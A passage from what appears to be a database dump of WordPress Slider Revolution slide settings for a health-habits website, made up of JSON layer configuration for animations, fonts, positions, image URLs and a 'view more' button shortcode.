To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Quicksand \",\"fontSize\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"50px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"900\",\"e\":true},\"n\":{\"v\":\"900\",\"e\":true},\"t\":{\"v\":\"900\"},\"m\":{\"v\":\"900\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"50px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"3\":{\"text\":\"[qodef_button size=\\\"medium\\\" text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button size=\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"v\":\"1200px\",\"e\":true},\"n\":{\"v\":\"1200px\",\"e\":true},\"t\":{\"v\":\"1200px\"},\"m\":{\"v\":\"1200px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"1200px\"},\"position\":{\"x\":{\"d\":{\"v\":\"516px\",\"e\":true},\"n\":{\"v\":\"512px\",\"e\":true},\"t\":{\"v\":\"512px\"},\"m\":{\"v\":\"511px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"98px\",\"e\":true},\"n\":{\"v\":\"105px\",\"e\":true},\"t\":{\"v\":\"105px\"},\"m\":{\"v\":\"118px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":1010},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":1010,\"startRelative\":1010},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":1010,\"startRelative\":1010},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(4,2,3,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h1-slide3-background.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"03\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[1000]},\"effects\":{\"parallax\":\"9\"}}','{\"1\":{\"text\":\"Image 2\",\"alias\":\"Image 2\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h1-slider1-graphic1.png\",\"imageId\":1043},\"size\":{\"width\":{\"d\":{\"v\":\"65px\",\"e\":true},\"n\":{\"v\":\"65px\",\"e\":true},\"t\":{\"v\":\"65px\"},\"m\":{\"v\":\"65px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"52px\",\"e\":true},\"n\":{\"v\":\"52px\",\"e\":true},\"t\":{\"v\":\"52px\"},\"m\":{\"v\":\"52px\",\"e\":true}},\"originalWidth\":65,\"originalHeight\":52,\"aspectRatio\":{\"d\":{\"v\":1.25},\"n\":{\"v\":1.25},\"t\":{\"v\":1.25},\"m\":{\"v\":1.25}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"v\":\"4px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"159px\",\"e\":true},\"n\":{\"v\":\"-139px\",\"e\":true},\"t\":{\"v\":\"-139px\"},\"m\":{\"v\":\"-175px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":200},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"speed\":500,\"start\":3000,\"startRelative\":1800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"2\":{\"text\":\"Build good habits with us in no time\",\"alias\":\"Start Healthy Life i...\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"v\":\"805px\",\"e\":true},\"n\":{\"v\":\"805px\",\"e\":true},\"t\":{\"v\":\"805px\"},\"m\":{\"v\":\"382px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"805px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-1px\",\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-27px\",\"e\":true},\"n\":{\"v\":\"-25px\",\"e\":true},\"t\":{\"v\":\"-25px\"},\"m\":{\"v\":\"-30px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Quicksand \",\"fontSize\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"50px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"900\",\"e\":true},\"n\":{\"v\":\"900\",\"e\":true},\"t\":{\"v\":\"900\"},\"m\":{\"v\":\"900\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"50px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"3\":{\"text\":\"[qodef_button size=\\\"medium\\\" text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button size=\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"v\":\"1200px\",\"e\":true},\"n\":{\"v\":\"1200px\",\"e\":true},\"t\":{\"v\":\"1200px\"},\"m\":{\"v\":\"1200px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"1200px\"},\"position\":{\"x\":{\"d\":{\"v\":\"516px\",\"e\":true},\"n\":{\"v\":\"512px\",\"e\":true},\"t\":{\"v\":\"512px\"},\"m\":{\"v\":\"511px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"98px\",\"e\":true},\"n\":{\"v\":\"105px\",\"e\":true},\"t\":{\"v\":\"105px\"},\"m\":{\"v\":\"118px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":1010},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":1010,\"startRelative\":1010},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1000,\"start\":1010,\"startRelative\":1010},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Open 